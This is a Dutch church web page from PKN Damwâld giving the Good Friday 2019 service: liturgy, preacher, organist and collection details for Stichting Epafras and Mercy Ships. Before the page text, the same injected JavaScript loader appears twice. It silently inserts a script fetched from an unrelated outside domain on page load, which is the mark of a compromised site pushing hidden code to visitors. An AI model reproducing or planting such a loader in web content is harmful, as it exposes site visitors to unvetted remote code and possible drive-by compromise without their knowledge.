;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Goede Vrijdag - PKN Damwâld
vrijdag 19 april 2019
09:30 uur
Viering Heilig Avondmaal

Goede Vrijdag

Informatie

Voorganger:Ds. G.J. Otter
Organist:Ivo van Hijum
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Ps. 27 : 1 en 7
Welkom
We zingen: Gez 189 : 1 en 2
Stil Gebed, Votum en Groet
We zingen: Ps 65 : 2 en 3
Gebed
We lezen: Johannes 19 : 16 - 29
Collecte
We zingen: Elb 114 : 1, 3 en 6
Preek .
We zingen: Elb 203 : 1 en 3
Formulier
Avondmaalsviering
We zingen: Ps 116 : 3 en 6
Dankzegging en voorbede
We zingen: Gez 189 : 3 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: St. Epafras

Goede Vrijdag Kerk: Stichting Epafras - Hulp aan Nederlandse gedetineerden in het buitenland
Stichting Epafras steunt Nederlanders die vast zitten in buitenlandse gevangenissen. Vanuit de overtuiging dat ieder mens waardevol is, laat Stichting Epafras niemand zitten. Het leven in een gevangenis is zwaar. Je zit vaak in overbevolkte cellen. Krijgt geen gezond eten. Je kunt nauwelijks luchten. Je begrijpt de taal niet. De juridische procedures zijn ingewikkeld. Je familie zie je niet. En juist daar moet je jarenlang wachten op je vrijheid. De medewerkers van Stichting Epafras luisteren naar de verhalen van Nederlandse gedetineerden. Hun verdriet, hun hoop. Hun levens. Zij helpen als de gevangenen hun hand uitsteken. Soms is de hulp praktisch. Het geven van medicijnen, omdat gedetineerden deze zelf niet krijgen. Of een telefoontje naar familieleden, omdat er geen geld is om zelf te bellen. Maar ze geven ook geestelijke steun. Daar zijn ze tenslotte professionele geestelijke verzorgers voor. Ze staan stil bij belangrijke levensvragen. Hoe je je leven weer op de rit kunt krijgen. Hoe je omgaat met schuld en verantwoordelijkheid. Met een gemiste kans en een nieuwe. Zo helpen ze Nederlanders met de voorbereiding op hun terugkeer. Daarom bezoeken de professionele geestelijk verzorgers van Stichting Epafras sinds 1984 gevangenen - van Peru tot Japan. Ook begeleiden ze steeds meer lokale geestelijk verzorgers in de ondersteuning van Nederlandse mannen en vrouwen die vaak jarenlang worden opgesloten

Tweede collecte: Kerk
Uitganscollecte: Mercy Ships

Goede Vrijdag Uitgang Avondmaalscollecte: Mercy Ships
Mercy Ships is een internationale medische hulporganisatie die sinds 1978 kansarme mensen - ongeacht leeftijd, ras, geslacht of religie- in de allerarmste ontwikkelingslanden voorziet van gratis medische zorg en ontwikkelingsprojecten. Dit doet Mercy Ships met behulp van Africa Mercy, 's werelds grootste particuliere ziekenhuisschip.